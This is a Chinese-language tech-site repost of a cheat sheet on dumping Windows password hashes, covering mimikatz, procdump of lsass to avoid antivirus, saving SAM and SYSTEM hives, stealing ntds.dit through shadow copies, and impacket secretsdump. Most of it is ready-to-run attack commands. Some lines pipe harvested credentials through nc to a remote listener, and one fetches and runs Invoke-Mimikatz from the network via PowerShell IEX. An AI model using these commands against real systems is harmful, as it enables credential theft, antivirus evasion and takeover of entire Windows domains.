提取hash

栏目: 数据库 · 发布时间: 5年前

内容简介:结合网上一些公开的资料进行简单总结,本文所用工具均已整理到云盘。链接:提取码:9w0n

结合网上一些公开的资料进行简单总结,本文所用 工具 均已整理到云盘。

链接: https://pan.baidu.com/s/10nPmRZ7SMCz6TrrAsXew_w

提取码:9w0n

WINDOWS

windows下的密码由SAM数据库储存,位置在 C:\windows\system32\config\sam

mimikatz

privilege::debug
token::elevate
lsadump::sam

提取hash

非交互

直接把结果发到vps接受

mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit |  nc -vv 192.168.0.1 1234  在目标机器上执行
nc -lvp 1234  本地[实际中通常都是在自己的vps上]机器执行

导入指定文件

mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full""  exit >> shash.txt

杀软

过杀软,先用procdump64.exe(微软的小工具)dump出数据然后下载到本地用mimikatz读取,本地读取要和目标系统完全一致。

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

提取hash

mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

提取hash

powershell调用mimikatz(不过感觉powershell也不太行了现在)

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" | nc -vv 192.168.3.28 1234
nc -lvp 1234  本地[实际中通常都是在自己的vps上]机器执行

mimikatz不只能抓密码还可以进行域内hash票据的一些操作。

pwdump7

提取hash

离线抓取目标主机密码

msf内置

hashdump 与 mimikatz

离线读取

用meterpreter下载 sys.hiv/sam.hiv/security.hiv 之后用impacket模块读取

reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save HKLM\security security.hiv

之后用meterpreter自带的download下载(reg save之后使得下载文件更小)

python /tmp/impacket/examples/secretsdump.py -sam sam.hiv -security security.hiv -system sys.hiv LOCA

提取hash

导出SAM数据库文件

保存注册表

reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv

提取hash

复制文件

C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SAM

直接复制报错,需要借用ps脚本

Invoke-NinjaCopy -Path <需要复制的文件> -LocalDestination <复制文件保存位置>

提取hash

域内dump所有用户hash

mimikatz

lsadump::dcsync /domain:pentestlab.local /all /csv

提取hash

获取NTDS

拿到域管权限可以提取域内所有用户的密码hash,hash存在DC的NTDS.DIT中的数据库文件中

Volume Shadow Copy获取ntds.dit

Volume Shadow Copy Service:

  1. 用于数据备份
  2. 支持win server 2003及以上
  3. 系统默认在特定条件下自动创建数据备份,如补丁安装后。在Win7系统大概每隔一周自动创建备份,该时间无法确定
  4. 禁用VSS会影响系统正常使用,如 System Restore和 Windows Server Backup

ntdsutil

查询当前快照列表(找到已有的直接从快照里把ntds.dit复制出来就好了)

ntdsutil snapshot "List All" quit quit
ntdsutil snapshot "List Mounted" quit quit

创建快照

ntdsutil snapshot "activate instance ntds" create quit quit

提取hash

拿到guid用于挂载快照

挂载快照

ntdsutil snapshot "mount {****************}" quit quit

复制ntds.dit

copy C:\$SNAP_201802270645_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit

提取hash

卸载快照

ntdsutil snapshot  "unmount {*******************}" quit quit

删除快照

ntdsutil snapshot  "delete {*********************}" quit quit

vssadmin

查询系统当前快照

vssadmin list shadows

创建快照

vssadmin create shadow /for=c:

复制快照

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\windows\NTDS\ntds.dit c:\ntds.dit

删除快照

vssadmin delete shadows /for=c: /quiet

Invoke-NinjaCopy

直接使用上文的强复制也行,也可以直接复制到一个远程服务器上

Invoke-NinjaCopy -Path <需要复制的文件> -LocalDestination <复制文件保存位置>

提取hash

vshadow

这个不是系统自带的需要自己上传

https://docs.microsoft.com/zh-cn/windows/desktop/VSS/vshadow-tool-and-sample

直接命令行运行会有example

提取hash

查询当前快照

vshadow.exe -q

创建快照

vshadow.exe -p -nw C:

复制快照

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\windows\NTDS\ntds.dit c:\ntds.dit

删除快照

vshadow -dx={809b77cc-cf9a-4101-b802-08e97d10e613}

不过我本地测试失败报错了

提取hash

vssown.vbs

https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs

cscript vssown.vbs /start
cscript vssown.vbs /create c
cscript vssown.vbs /list
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\ntds\ntds.dit C:\
cscript vssown.vbs /delete

提取hash

提取hash

NTDS提取

impacket

python secretsdump.py -system /tmp/sys.hiv  -ntds /root/Desktop/ntds.dit LOCAL

提取hash


以上所述就是小编给大家介绍的《提取hash》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

人本界面

人本界面

(美)拉斯基(Jef Raskin) / 史元春 / 机械工业出版社 / 2004-1-1 / 28.0

如果我们想克服目前人机界面上的固有缺陷,就很有必要理解本书的教义;若无此愿望,读读也无妨。交互设计的许多重要方面此书并没有包括在内,因为许多文献中都已经有详尽的阐述。本书的意图是补充现有的界面设计的方法或预测未来。  本书概述了人机界面设计领域的研究成果,详细论证了界面设计思想应以认知学为基础,并考虑人类的心智特点,在指出当前界面设计中弊端的同时,提出了新产品开发的思路。本书集计算机科学、人体工程......一起来看看 《人本界面》 这本书的介绍吧!

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

Base64 编码/解码
Base64 编码/解码

Base64 编码/解码

正则表达式在线测试
正则表达式在线测试

正则表达式在线测试